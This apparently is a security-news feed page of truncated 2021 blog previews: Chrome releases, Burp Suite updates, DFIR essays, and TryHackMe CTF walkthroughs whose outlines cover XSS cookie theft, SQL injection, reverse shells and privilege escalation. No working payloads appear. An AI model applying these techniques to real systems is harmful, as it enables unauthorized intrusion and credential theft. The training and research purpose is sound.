    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 94 is beta as of August 26, 2021. WebCodecs Existing media APIs (HTMLMediaElement, Media Source Extensions, WebAudio, MediaRecorder, and WebRTC) are high-level and narrowly-focused. A low-level codec API would better support emerging applications, such as latency-sensitive game streaming, client-side effects or transcoding, and polyfillable media container support, without the increased network and CPU cost of JavaScript or WebAssembly codec implementations. The WebCodecs API eliminates these deficiencies by giving programmers a w…
  • Open

    Tips for DFIR Analysts
    Over the years as a DFIR analyst...first doing digital forensics analysis, and then incorporating that analysis as a component of IR activity...there have been some stunningly simple truths that I've learned, truths that I thought I'd share. Many of these "tips" are truisms that I've seen time and time again, and recognized that they made much more sense and had more value when they were "named". Tips, Thought, and Stuff to Think About Computer systems are a finite, deterministic space. The adversary can only go so far, within memory or on the hard drive. When monitoring computer systems and writing detections, the goal is not write the perfect detection, but rather to force the adversary into a corner, so that no matter what they do, they will trigger something. So, it's a good thing to…  ( 9 min )
  • Open

    Burp extensions added to Burp Suite Enterprise Edition
    Burp Extensions (and your own custom extensions) will now be supported by Burp Suite Enterprise Edition, brand new for the 2021.8 release. If you've had much experience with Burp Suite Professional, i  ( 5 min )
  • Open

    Burp extensions added to Burp Suite Enterprise Edition
    Burp Extensions (and your own custom extensions) will now be supported by Burp Suite Enterprise Edition, brand new for the 2021.8 release. If you've had much experience with Burp Suite Professional, i  ( 5 min )

  • Open

    It's now easier than ever to scan at scale with Burp Suite Enterprise Edition
    774 organizations in 68 countries are now using Burp Suite Enterprise Edition to improve and scale security across their web portfolios. As we pass the three-year anniversary of development on Burp Su  ( 4 min )
  • Open

    It's now easier than ever to scan at scale with Burp Suite Enterprise Edition
    774 organizations in 68 countries are now using Burp Suite Enterprise Edition to improve and scale security across their web portfolios. As we pass the three-year anniversary of development on Burp Su  ( 4 min )

  • Open

    A New Attack Surface on MS Exchange Part 3 - ProxyShell!
    No content preview

  • Open

    The history of OAST in Burp Suite
    At PortSwigger, we pride ourselves on pushing the boundaries of web security. Just take a peek at some of our researchers' recent and upcoming talks from the likes of Black Hat and DEF CON if you'd li  ( 4 min )
  • Open

    The history of OAST in Burp Suite
    At PortSwigger, we pride ourselves on pushing the boundaries of web security. Just take a peek at some of our researchers' recent and upcoming talks from the likes of Black Hat and DEF CON if you'd li  ( 4 min )
  • Open

    Domain Escalation – PrintNightmare
    Printers are part of every corporate infrastructure therefore Windows environments they have a number of embedded drivers installed. The Print Spooler (spoolsv.exe) service is responsible… Continue reading → Domain Escalation – PrintNightmare  ( 5 min )
  • Open

    Domain Escalation – PrintNightmare
    Printers are part of every corporate infrastructure therefore Windows environments they have a number of embedded drivers installed. The Print Spooler (spoolsv.exe) service is responsible… Continue reading → Domain Escalation – PrintNightmare  ( 5 min )

  • Open

    HiveNightmare
    The security account manager (SAM) file contains the password hashes of the users on a Windows system. Since it is considered a sensitive file SYSTEM… Continue reading → HiveNightmare  ( 6 min )
  • Open

    HiveNightmare
    The security account manager (SAM) file contains the password hashes of the users on a Windows system. Since it is considered a sensitive file SYSTEM… Continue reading → HiveNightmare  ( 6 min )

  • Open

    PHDays 10 IDS Bypass contest: writeup and solutions
    For the second time, the IDS Bypass contest was held at the Positive Hack Days conference. Just like last time (see blog.ptsecurity.com/2019/07/ids-bypass-contest-at-phdays-writeup.html), the players were supposed not only to find flaws in the six services and capture the flags, but also bypass the IDS, which would interfere with them. Alert messages about the facts of triggering IDS rules were supposed to help in bypassing them. And as you know from the last competition, there can be infinitely many solutions to tasks. Here we go. 192.168.30.10—Apache Tomcat On port 8080, we can see Apache Tomcat version 9.0.17. The first search for an exploit for this version should lead to CVE-2019-0232. This task was intended as an introductory one and was supposed to be the simplest (although som…
  • Open

    PHDays 10 IDS Bypass contest: writeup and solutions
    For the second time, the IDS Bypass contest was held at the Positive Hack Days conference. Just like last time (see blog.ptsecurity.com/2019/07/ids-bypass-contest-at-phdays-writeup.html), the players were supposed not only to find flaws in the six services and capture the flags, but also bypass the IDS, which would interfere with them. Alert messages about the facts of triggering IDS rules were supposed to help in bypassing them. And as you know from the last competition, there can be infinitely many solutions to tasks. Here we go. 192.168.30.10—Apache Tomcat On port 8080, we can see Apache Tomcat version 9.0.17. The first search for an exploit for this version should lead to CVE-2019-0232. This task was intended as an introductory one and was supposed to be the simplest (although som…
  • Open

    “En-pass” — TryHackme Walkthrough (Medium Level CTF)
    Bu odada bizden web sitesi içerisinde gizlenmiş Path’i bulmamız isteniyor. Bulduğumuz pathlerden edindiğimiz bilgilerle makineyi çözmemiz… Continue reading on Medium »  ( 5 min )
  • Open

    “En-pass” — TryHackme Walkthrough (Medium Level CTF)
    Bu odada bizden web sitesi içerisinde gizlenmiş Path’i bulmamız isteniyor. Bulduğumuz pathlerden edindiğimiz bilgilerle makineyi çözmemiz… Continue reading on Medium »  ( 5 min )

  • Open

    A New Attack Surface on MS Exchange Part 1 - ProxyLogon!
    No content preview
    A New Attack Surface on MS Exchange Part 2 - ProxyOracle!
    No content preview

  • Open

    How The Best Defense Gets Better: Part 2
    For many enterprises, incident response is an exercise in chaos. Security teams scramble to figure out how a data breach happened and crash into brick walls as they try to collect information from different departments that are often siloed from everyone else. It doesn’t have to be that way. Advanced security teams have learned that […] The post How The Best Defense Gets Better: Part 2 appeared first on Security Weekly.  ( 2 min )

  • Open

    Posting limits have been enabled on r/opendirectories.
    I'm not going to name any names, but because of many complaints of too many threads being created in a short time period by one user, we have set a limit of 2 5 posts per hour for any one user. This is not for comments, just new posts. Let us know if the limit is set too high or too low and we can adjust it if enough people agree. thanks, Your Loving Mods. edit: after reading the comments, the posting rate has been adjusted to 5 posts per user per hour. submitted by /u/MrDorkESQ [link] [comments]  ( 4 min )

  • Open

    APT31 new dropper. Target destinations: Mongolia, Russia, the U.S., and elsewhere
    Our pros at the PT Expert Security Center regularly spot emerging threats to information security and track the activity of hacker groups. During such monitoring in April 2021, a mailing list with previously unknown malicious content was sent to Mongolia. Similar attacks were subsequently identified in Russia, Belarus, Canada, and the United States. According to PT ESC threat intelligence analysts, from January to July 2021, approximately 10 attacks were carried out using the discovered malware samples. Some of the files found during the study had rather interesting names ("хавсралт.scr" ["havsralt.scr"] (mong. attachment), "Информация_Рб_июнь_2021_года_2021062826109.exe") and, as the study showed, they contained a remote access trojan (RAT). A detailed analysis of malware samples, data on…
  • Open

    APT31 new dropper. Target destinations: Mongolia, Russia, the U.S., and elsewhere
    Our pros at the PT Expert Security Center regularly spot emerging threats to information security and track the activity of hacker groups. During such monitoring in April 2021, a mailing list with previously unknown malicious content was sent to Mongolia. Similar attacks were subsequently identified in Russia, Belarus, Canada, and the United States. According to PT ESC threat intelligence analysts, from January to July 2021, approximately 10 attacks were carried out using the discovered malware samples. Some of the files found during the study had rather interesting names ("хавсралт.scr" ["havsralt.scr"] (mong. attachment), "Информация_Рб_июнь_2021_года_2021062826109.exe") and, as the study showed, they contained a remote access trojan (RAT). A detailed analysis of malware samples, data on…

  • Open

    HYBRID HACKER SUMMER CAMP 2021 GUIDE — Part Five: FuzzCON
    Welcome to the DEFCON 201 guide to Hybrid Hacker Summer Camp! This is part of a series where we are going to cover all the various hacker… Continue reading on Medium »  ( 8 min )
  • Open

    HYBRID HACKER SUMMER CAMP 2021 GUIDE — Part Five: FuzzCON
    Welcome to the DEFCON 201 guide to Hybrid Hacker Summer Camp! This is part of a series where we are going to cover all the various hacker… Continue reading on Medium »  ( 8 min )
  • Open

    Universal Privilege Escalation and Persistence – Printer
    The Print Spooler is responsible to manage and process printer jobs. It runs as a service with SYSTEM level privileges on windows environments. Abuse of… Continue reading → Universal Privilege Escalation and Persistence – Printer  ( 5 min )
  • Open

    Universal Privilege Escalation and Persistence – Printer
    The Print Spooler is responsible to manage and process printer jobs. It runs as a service with SYSTEM level privileges on windows environments. Abuse of… Continue reading → Universal Privilege Escalation and Persistence – Printer  ( 5 min )

  • Open

    Chrome 93: Multi-Screen Window Placement, PWAs as URL Handlers, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Android WebView, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 93 is beta as of July 29, 2021. Origin Trials This version of Chrome introduces the origin trials described below. Origin trials allow you to try new features and give feedback on usability, practicality, and effectiveness to the web standards community. To register for any of the origin trials currently supported in Chrome, including the ones described below, visit the Chrome Origin Trials dashboard. To learn more about origin trials in Chrome, visit the Origin Trials Guide for Web Developers. Microsoft Edge runs i…

  • Open

    Introducing the Burp Suite Certified Practitioner accreditation
    We launched the Web Security Academy in April 2019, as a means of providing free training and learning materials for security professionals. We now have 200 labs, and last year the Web Security Academ  ( 4 min )
  • Open

    Introducing the Burp Suite Certified Practitioner accreditation
    We launched the Web Security Academy in April 2019, as a means of providing free training and learning materials for security professionals. We now have 200 labs, and last year the Web Security Academ  ( 4 min )

  • Open

    Diversifying Cybersecurity Talent Through Aptitude Testing
    With a shortage of four million cybersecurity workers, we need to get more creative in identifying non-technical skills among potential candidates that can be applied to the cybersecurity realm. One way is to test them for aptitude and personality traits, like the career planning tests I took in college.That’s what the University of Maryland did […] The post Diversifying Cybersecurity Talent Through Aptitude Testing appeared first on Security Weekly.  ( 2 min )
  • Open

    Faster and more efficient phishing detection in M92
    Keeping Chrome users safe as they browse the web is crucially important to Chrome; in fact, security has always been one of our four core principles. In some cases, security can come at the expense of performance. In our next post in The Fast and the Curious series, we are excited to share how improvements to our phishing detection algorithms keeps users safe online. With these improvements, phishing detection is now 50 times faster and drains less battery. Phishing detection Every time you navigate to a new page, Chrome evaluates a collection of signals about the page to see if it matches those of phishing sites. To do that, we compare the color profile of the visited page - that’s the range and frequency of the colors present on the page - with the color profiles of common pages. For e…

  • Open

    How to detect a cyberattack and prevent money theft
    Money theft is one of the most important risks for any organization, regardless of its scope of activity. According to our data, 42% of cyberattacks on companies are committed to obtain direct financial benefits. You can detect an attack at various stages — from network penetration to the moment when attackers start withdrawing money. In this article, we will show how to detect an attack at each of its stages and minimize the risk, as well as analyze two common scenarios of such attacks: money theft manually using remote control programs and using special malware — a banking trojan. Where to look for signs of the attack Penetration into the company's network Phishing emails Most often, attackers get into the local network by sending phishing emails with malicious attachme…
  • Open

    How to detect a cyberattack and prevent money theft
    Money theft is one of the most important risks for any organization, regardless of its scope of activity. According to our data, 42% of cyberattacks on companies are committed to obtain direct financial benefits. You can detect an attack at various stages — from network penetration to the moment when attackers start withdrawing money. In this article, we will show how to detect an attack at each of its stages and minimize the risk, as well as analyze two common scenarios of such attacks: money theft manually using remote control programs and using special malware — a banking trojan. Where to look for signs of the attack Penetration into the company's network Phishing emails Most often, attackers get into the local network by sending phishing emails with malicious attachme…

  • Open

    Making numbers out of thin air, Python bytecode edition
    div#pydemo { display: flex; flex-direction: column; font-size: 1.4em; } .dup { color: #0f0; } div.pydemotop { display: flex; flex-direction: row; padding-top: 0.5em; padding-bottom: 0.5em; background-color: #2a2855; } div.pydemobottom { display: flex; flex-direction: row; min-height: 25em; } div#pynum { width: 50%; } div#pynum input { width: 100%; text-align: center; font-size: 1em; background-color: #2a2855; color: white; border: none; padding-top: 0.5em; padding-bottom: 0.5em; } div#pyast { background-color: #2a2855; width: 50%; text-align: center; } div#pyastvalue { padding-top: 0.5em; padding-bottom: 0.5em; color: white; } div#pystackbefore { padding-top: 0.5em; back…

  • Open

    Increasing HTTPS adoption
    When a browser connects to websites over HTTPS (vs. HTTP), eavesdroppers and attackers on the network can't intercept or alter the data that's shared over that connection (including personal info, or even the page itself). This level of privacy and security is vital for the web ecosystem, so Chrome continues to invest in making HTTPS more widely supported. Thankfully, HTTPS adoption has come a long way in recent years, and most operating systems now see 90%+ of page loads over HTTPS in Chrome. Still, there's more we can do to help make HTTPS the preferred protocol on the web, and better protect users on the remaining slice of the web that doesn’t yet support HTTPS, so today we're sharing some future work in this area. Opting in to an HTTPS-First World Beginning in M94, Chrome will…

  • Open

    OISF 2021 Videos
    OISF 2021 Videos These are the videos from the OISF Anniversary Event Opening Remarks OISF President Inside the Mind of a Threat Actor: Beyond Pentesting Phillip Wylie I Got 99 Problems but a WAF ain't one Micah Brown Code Hedgehogs - Changing the "S" in SDLC to Secure Penelope Rozhkova A Look at Cellular Services in IoT technology Deral Heiland Chats, Cheats, and Cracks: Abuse of Collaboration Platforms in Malware Campaigns Edmund Brumaghin Lend me your IR's! Matt Scheurer Download from: https://archive.org/details/oisf2021

  • Open

    Burp Suite roadmap update: July 2021
    Apparently we're halfway through 2021 already (where does the time go?). Here's an update on what we've added to our products so far this year, as well as some exciting new features we're adding to ou  ( 5 min )
  • Open

    Burp Suite roadmap update: July 2021
    Apparently we're halfway through 2021 already (where does the time go?). Here's an update on what we've added to our products so far this year, as well as some exciting new features we're adding to ou  ( 5 min )

  • Open

    ClickMeeting minor privacy weakness (fixed)
    Just a short reminder to anonymize data on the server-side and not in the browser, illustrated by a small privacy vulnerability I've found during, well, a security talk I've attended that took place on the ClickMeeting platform (it was still 10 minutes before the talk began you understand). Props to ClickMeeting for a fast reaction time and good communication - this bug is long fixed (reported on April 7th 2021). Original report (though redacted a bit) follows: Hey folks, I've joined a webinar hosted on clickmeeting platform today, and noticed one thing which I found curious. The webinar I attended had chat enabled, however there seem to be some "privacy mode" enabled for attendees - i.e. the chat didn't display the list of people (which is pretty standard…

  • Open

    Black Hat USA 2021: PortSwigger's latest research to be unveiled
    Two years ago, PortSwigger's director of research James Kettle presented "HTTP Desync Attacks" on-stage at BlackHat USA and kicked off a wave of request smuggling, but at that time HTTP/2 escaped seri  ( 4 min )
  • Open

    Black Hat USA 2021: PortSwigger's latest research to be unveiled
    Two years ago, PortSwigger's director of research James Kettle presented "HTTP Desync Attacks" on-stage at BlackHat USA and kicked off a wave of request smuggling, but at that time HTTP/2 escaped seri  ( 4 min )

  • Open

    popen+cat explained
    A few days ago I tweeted about this "open and read a file with popen+cat" gem I found in the firmware of one of NETGEAR's devices: How to read a file in C according to NETGEAR pic.twitter.com/TRbxWC5vsY — Gynvael Coldwind (@gynvael) July 1, 2021 Since there were some questions about "why is this a bad pattern?", I decided to write a short blog post explaining this. But before we get there, please also see this short thread, or just remember to not blame an individual engineer for writing that code – rather blame the procedures NETGEAR has with regards to secure code development and quality assurance. Context? Let's start by adding some more context to this tweet – where is this code from, and is it the source code or something else? This code was found in the firm…

  • Open

    Introducing DOM Invader: DOM XSS just got a whole lot easier to find
    Of the three main types of XSS, DOM-based XSS is by far the most difficult to find and exploit. But we come bearing good news! PortSwigger just released a new tool for Burp Suite Professional and Burp  ( 7 min )
  • Open

    Introducing DOM Invader: DOM XSS just got a whole lot easier to find
    Of the three main types of XSS, DOM-based XSS is by far the most difficult to find and exploit. But we come bearing good news! PortSwigger just released a new tool for Burp Suite Professional and Burp  ( 7 min )
  • Open

    Preventing Criminals from Using Cloud Applications to Inject Chaos Into Work Environments
    In 2020, cyber criminals used cloud applications, the cover of a pandemic, and a newly embraced work-from-home culture to serve up ransomware, steal data, and disrupt how companies do business. The year is over, but the challenges and risks remain.  How do we prevent these criminals from injecting chaos into our hybrid work environments? As […] The post Preventing Criminals from Using Cloud Applications to Inject Chaos Into Work Environments appeared first on Security Weekly.  ( 2 min )

  • Open

    Gears of Chaos vulnerability chain (NETGEAR WAC104 access point)
    <img src="https://gynvael.coldwind.pl/img/gears-of-chaos-small.png" alt="Name of the vulnerability - Gears of Chaos - in a black horror-style font on stained white-and-black background" style="width:100%; height: auto; margin: 0; margin-bottom: 0.5em"> As mentioned in previous post, NETGEAR WAC104 access point just had a couple of vulnerabilities patched and you should upgrade its firmware now if you own such a device at your company or at home (or anywhere else). <img src="https://gynvael.coldwind.pl/img/wac104_t.jpg" alt="Photo of a NETGEAR WAC104 access point without the casing."> NETGEAR WAC104 access point Actually there might be more affected devices: WAC104 - fix available WNDR3700v5 - might be vulnerable (unconfirmed), …

  • Open

    How the Best Defense Gets Better
    Security starts before detection and response, but many organizations focus there first. Mature security teams understand the importance of identification and protection.  Establishing good cyber hygiene and taking proactive measures to secure themselves against the ever-increasing threat landscape is a critical first step in a holistic security program.  How should organizations build a holistic security […] The post How the Best Defense Gets Better appeared first on Security Weekly.  ( 2 min )

  • Open

    关于我大学这四年
    昨天回到学校搬家,大学四年使用的各种物件仅仅用两个大纸箱就全部打包好了。白驹过隙,四年前和父母一起拎着行囊打开宿舍门的那一幕的情景现在还能清晰地在脑海里浮现,而却已经是到了要离开的时刻了。这段时间总还是有些伤感、有些不舍,下班之后躺在床上回顾起大学的这四年来,有些片段久久不能忘怀,思来想去总觉得是要总结一下,于是就有了现在,最后一次坐在已经收拾得空空如也的寝室书桌旁码字,可能并不会有什么逻辑,想到哪说到哪。

  • Open

    What We Know About The Ransomware Economy
    Okay, I think that we can all admit that ransomware has consumed the news cycle of late, thanks to high visibility attacks such as Colonial Pipeline and JBS. Interestingly enough, there wasn't this sort of reaction the second time the City of Baltimore got attacked, which (IMHO) belies the news cycle more than anything else. However, while the focus is on ransomware, for the moment, it's a good time to point out that there's more to this than just the attacks that get blasted across news feeds. That is, ransomware itself is an economy, an eco-system, which is a moniker that goes a long way to toward describing why victims of these attacks are impacted to the extent that they are. What I mean by this is that everything...EVERYTHING...about what goes into a ransomware attack is directed at t…  ( 6 min )
    Thoughts on Assessing Threat Actor Intent & Sophistication
    I was reading this Splunk blog post recently, and I have to say up front, I was disappointed by the fact that the promise of the title (i.e., "Detecting Cl0p Ransomware") was not delivered on by the remaining content of the post. Very early on in the blog post is the statement: Ransomware is by nature a post-exploitation tool, so before deploying it they must infiltrate the victim's infrastructure.  Okay, so at this point, I'm looking for something juicy, some information regarding the TTPs used to "infiltrate the victim's infrastructure" and to locate files of interest for staging and exfil, but instead, the author(s) dove right into analyzing the malware itself, through reverse engineering. Early in that malware RE exercise is the statement: This ransomware has a defense evasion feature …  ( 5 min )

  • Open

    Building XSS Polyglots
    XSS polyglots are quite popular among beginners and lazy XSS testers since they only require a single copy and paste. Although doomed to be easily flagged by any decent filter or WAF, they can be useful to spot most of the XSS cases out there. Here we will try to build a cost-effective XSS polyglot, … Continue reading Building XSS Polyglots The post Building XSS Polyglots appeared first on Brute XSS.
  • Open

    Making the Case for Supply Chain Behavior Transparency
    The Biden Administration’s Cyber Executive Order includes a Software Bill of Materials (SBOM), an electronically readable format designed to provide an inventory of third-party components that make up software components.  It is a critical and necessary first measure for protecting the software supply chain, but is it enough?One of the biggest challenges to supply chain transparency […] The post Making the Case for Supply Chain Behavior Transparency appeared first on Security Weekly.  ( 2 min )
  • Open

    WAC104 vulnerabilities - please go patch (details on Monday)
    Just a short post (I will publish a longer one with details on Monday) – if you have the following NETGEAR access point, you should upgrade your firmware now: WAC104 NETGEAR's advisory and the firmware can be found here: Security Advisory for Authentication Bypass on WAC104, PSV-2021-0075 WAC104 — Dual Band 802.11ac Wireless Access Point – Firmware and Software Downloads Please note that NETGEAR assigned CVSS v3.1 score of 8.8 (High), which is incorrect (unless I misread the CVSS specification) - it's actually 9.8 (Critical): Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H This firmware fixes also a couple of other vulnerabilities with lower CVSS scores. More details on Monday. P.S. This vulnerability chain is dubbed Gears of Chaos (in line with my sense of humor).

  • Open

    Introducing Striker and the Payload Automation Libraries
    TL;DR – Striker, Compyler, Artifactor, Sleepy, and Detemplate are a set of Python libraries we created to help make building custom payloads faster, more consistent, and more OPSEC safe and allow for better IoC tracking during Red Team operations. The libraries can be found on GitHub here: https://github.com/emcghee/PayloadAutomation. Introduction During an operation, we were creating a custom initial access payload which would execute a Cobalt Strike Beacon. The payload was fairly complex with multiple components coming together and multiple steps to obfuscate the shellcode before embedding it into the payload. During the preparation phase of the operation, we went through multiple profile and listener variations and needed to test our initial access payload with each variation. This m…
  • Open

    BSides Cleveland 2021 Videos
    BSides Cleveland 2021 Videos These are the videos from the Bsides Cleveland conference. Thanks to Rich, securid as the video team. Thanks to twuntymcslore & RockieBrockway for being con mom & dad. These are the first con recordings I've done in 1 year and 3 months. It seems something may have changed after some updates. These OBS videos have variable audio sync problems that are not a set number of milliseconds I could easily set the same sync settings to. I fixed them the best I could, but I've included the raw files if someone can figure a better way to fix variable sync delays. Contact me if you find a better way. Ministraitor (my European counterpart that does more cons than me) gave me some tips to fix future problems. Intro Rockie Brockway I Don t Know Snow Computer Forensics Case Files Tyler Hudak Improving Cyber Security Alex Kot Lend Me You IRs Matt Scheurer Tale From The Audit Justin Leapline Table Top Jeremy Mio Vulnerability Disclosure Policies Hack Responsibly MzBat Pentest Stories Justin Bollinger Advisor Person Rick Yocum

  • Open

    Changes to Chrome OS’s release cycle
    We previously announced that Chrome will soon release a new milestone every 4 weeks, starting with Chrome 94 in Q3 of 2021. We’re excited to also share our plans today for adjusting the Chrome OS release schedule. To deliver new features more rapidly to consumers while also continuing to prioritize the key pillars of Chrome OS – security, stability, speed and simplicity – Chrome OS will move to a 4-week stable channel starting with M96 in Q4. For enterprise and education users, Chrome OS will also introduce a new channel with a 6-month update cadence by M96. More details to be announced soon. To bridge the gap between M94 when Chrome moves to a four week release and M96, Chrome OS will skip M95 (see the updated Chrome schedule page for milestone-specific details). As we head into our next decade, these changes enable us to evolve Chrome OS to keep helping people get things done and to provide more helpful and secure experiences. Marina Kazatcker, Chrome OS Release TPM Lead

  • Open

    TryHackMe > Unbaked Pie
    Don’t over-baked your pie! Please allow 5 minutes for this instance to fully deploy before attacking. This VM was developed in collaboration with @ch4rm, thanks to him for the foothold and privilege escalation ideas. Contents 1 User Flag 1.1 Services 1.2 Django application 1.3 Pickle in the search 1.4 Exploit 1.5 Evade docker 1.6 Database 1.7 Brute force ramsey’s SSH account 1.8 Ramsey’s flag 2 Root Flag 2.1 Lateral move (ramsey -> oliver) 2.2 Privilege escalation User Flag Services Running Nmap will only reveal 1 open port: PORT STATE SERVICE VERSION 5003/tcp open filemaker? | fingerprint-strings: | GetRequest: | HTTP/1.1 200 OK | Date: Sat, 05 Jun 2021 05:28:13 GMT | Server: WSGIServer/0.2 CPython/3.8.6…
  • Open

    Toolmarks: LNK Files in the news again
    As most regular readers of this blog can tell you, I'm a bit of a fan of LNK files...a LNK-o-phile, if you will. I'm not only fascinated by the richness of the structure, but as I began writing a parser for LNK files, I began too see some interesting aspects of intelligence that can be gleaned from LNK files, in particular, those created within a threat actors development environment, and deployed to targets/infrastructures. First, there are different ways to create LNK files using the Windows API, and what's really cool is that each method has it's own unique #toolmarks associated with it!   Second, most often there is a pretty good amount of metadata embedded in the LNK file structure. There are file system time stamps, and often we'll see a NetBIOS system name, a volume S/N, a SID, or o…  ( 5 min )
    Testing, and taking DFIR a step further
    One of Shakespeare's lines from Hamlet I remember from high school is, "...there are more things on heaven and earth, Horatio, than are dreamt of in your philosophy." And that's one of the great things about the #DFIR industry...there's always something new. I do not for a moment think that I've seen everything, and I, for one, find it fascinating when we find something that is either new, or that has been talked about but is being seen "in the wild" for the first time. Someone mentioned recently that Microsoft's Antimalware Scan Interface (i.e., AMSI) could be used for persistence, and that got me very interested.  This isn't something specifically or explicitly covered by the MTRE ATT&CK framework, and I wanted to dig into this a bit more to understand it. As it can be used for persisten…  ( 5 min )

  • Open

    Chrome 92: Web Apps as File Handlers, New JavaScript Features, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 92 is beta as of June 3, 2021 File Handling API Now that web apps are capable of reading and writing files, the next logical step is to let developers declare web apps as file handlers for files they create and process. The File Handling API allows you to do exactly this. For example, after a text editor PWA has registered itself as a file handler, you can right-click a .txt file in your operating system's file manager and instruct this PWA to (always or just once) open .txt files. This means PWAs are just a (double) click away from…

  • Open

    20 Burp Suite tips from the Burp user community
    The Burp Suite user community can easily be described as passionate, dedicated, and highly invested in the development of our product. That's why we love it when our users take it upon themselves to q  ( 5 min )
  • Open

    20 Burp Suite tips from the Burp user community
    The Burp Suite user community can easily be described as passionate, dedicated, and highly invested in the development of our product. That's why we love it when our users take it upon themselves to q  ( 5 min )

  • Open

    TryHackMe > Cooctus Stories
    This room is about the Cooctus Clan. Previously on Cooctus Tracker Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened. (From Overpass 2 - Hacked by NinjaJc01) Present times Further investigation revealed that the hack was made possible by the help of an insider threat. Paradox helped the Cooctus Clan hack overpass in exchange for the secret shiba stash. Now, we have discovered a private server deep down under the boiling hot sands of the Saharan Desert. We suspect it is operated by the Clan and it’s your objective to uncover their plans. Note: A stable shell is recommended, so try and SSH into users when possible. Con…
    TryHackMe > VulnNet Roasted
    VulnNet Entertainment quickly deployed another management instance on their very broad network… VulnNet Entertainment just deployed a new instance on their network with the newly-hired system administrators. Being a security-aware company, they as always hired you to perform a penetration test, and see how system administrators are performing. Difficulty: Easy Operating System: Windows This is a much simpler machine, do not overthink. You can do it by following common methodologies. Note: It might take up to 6 minutes for this machine to fully boot. Author: TheCyb3rW0lf Discord: TheCyb3rW0lf#8594 Icon made by DinosoftLabs from www.flaticon.com Contents 1 What is the user flag? (Desktop.txt) 1.1 Services 1.2 Samba 1.3 Find users 1.4 Find users without K…

  • Open

    Chrome is up to 23% faster in M91 and saves over 17 years of CPU time daily
    Since the launch of Chrome in 2008, speed has been one of the 4 core principles that shape the work we do to deliver a highly performant browser. The V8 JavaScript compiler is a critical part of delivering maximum speed for the JavaScript that’s shipped on practically every web page. In our next post in The Fast and the Curious series, we are excited to share how improvements to the V8 engine are delivering up to 23% faster performance. An important component of delivering a fast browser is fast JavaScript execution. In Chrome, that job is done by the V8 engine which executes over 78 years worth of JavaScript code on a daily basis. In M91 Chrome is now up to 23% faster with the launch of a new Sparkplug compiler and short builtin calls, saving over 17 years of our users' CPU time each da…
  • Open

    Some of the best Burp extensions - as chosen by you
    As we mentioned in our recent blog post on good resources for new Burp Suite Professional users, the BApp Store is one of the largest repositories of community-created user content you're likely to fi  ( 3 min )
  • Open

    Some of the best Burp extensions - as chosen by you
    As we mentioned in our recent blog post on good resources for new Burp Suite Professional users, the BApp Store is one of the largest repositories of community-created user content you're likely to fi  ( 3 min )
  • Open

    TryHackMe > VulnNet Internal
    VulnNet Entertainment learns from its mistakes, and now they have something new for you… VulnNet Entertainment is a company that learns from its mistakes. They quickly realized that they can’t make a properly secured web application so they gave up on that idea. Instead, they decided to set up internal services for business purposes. As usual, you’re tasked to perform a penetration test of their network and report your findings. Difficulty: Easy/Medium Operating System: Linux This machine was designed to be quite the opposite of the previous machines in this series and it focuses on internal services. It’s supposed to show you how you can retrieve interesting information and use it to gain system access. Report your findings by submitting the correct flags. Note: It might take …

  • Open

    TryHackMe > toc2
    It’s a setup... Can you get the flags in time? I have a theory that the truth is never told during the nine-to-five hours. - Hunter S. Thompson Contents 1 Find and retrieve the user.txt flag 1.1 Services 1.2 CMS information 1.3 CMS Made Simple / Reverse Shell 1.4 User flag 2 Escalate your privileges and acquire root.txt 2.1 Lateral move (www-data -> frank) 2.2 The readcreds binary 2.3 Race condition 2.4 Root flag Find and retrieve the user.txt flag Services Nmap reveals 2 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 84:4e:b1:49:31:22:94:84:83:97:91:72:cb:23:33:36 (RSA) | 256 cc:32:19:3f:f5:b9:a4:d5:ac:32:0f:6e:f0:83:35:71 (ECDSA) …

  • Open

    Dumping RDP Credentials
    Administrators typically use Remote Desktop Protocol (RDP) in order to manage Windows environments remotely. It is also typical RDP to be enabled in systems that… Continue reading → Dumping RDP Credentials  ( 5 min )
  • Open

    Dumping RDP Credentials
    Administrators typically use Remote Desktop Protocol (RDP) in order to manage Windows environments remotely. It is also typical RDP to be enabled in systems that… Continue reading → Dumping RDP Credentials  ( 5 min )

  • Open

    TryHackMe > The Marketplace
    Can you take over The Marketplace’s infrastructure? The sysadmin of The Marketplace, Michael, has given you access to an internal server of his, so you can pentest the marketplace platform he and his team has been working on. He said it still has a few bugs he and his team need to iron out. Can you take advantage of this and will you be able to gain root access on his server? Contents 1 What is flag 1? 1.1 Services 1.2 Web application 1.3 Token cookie 1.4 XSS vulnerability 1.5 Stealing the admin cookie 2 What is flag 2? (User.txt) 2.1 SQLi vulnerability 2.2 Exploit the SQL injection 2.2.1 Database and tables 2.2.2 Users table 2.2.3 Messages table 2.3 Connect as jake 3 What is flag 3? (Root.txt) 3.1 Lateral move (jake -> michael) 3.…

  • Open

    A few tips for the newcomers on this sub !
    This post is mainly intended to help the people who discover this sub to start with. It could also be useful for the other folks, who knows ? What is an open directory ? Open directories (aka ODs or opendirs) are just unprotected websites that you can browse recursively, without any required authentication. You can freely download individual files from them. They're organised in a folder structure, as a local directory tree on your computer. This is really convenient as you can also download several files in a bunch recursively (See below). These sites are sometimes deliberately let open and, sometimes, inadvertently (seedboxes, personal websites with some dirs bad protected, ...). For these last ones, often, after someone has posted them here, they're hammered by many concurrent downlo…  ( 8 min )
  • Open

    FAQ: Difference between vulnerability, exploit and CVE
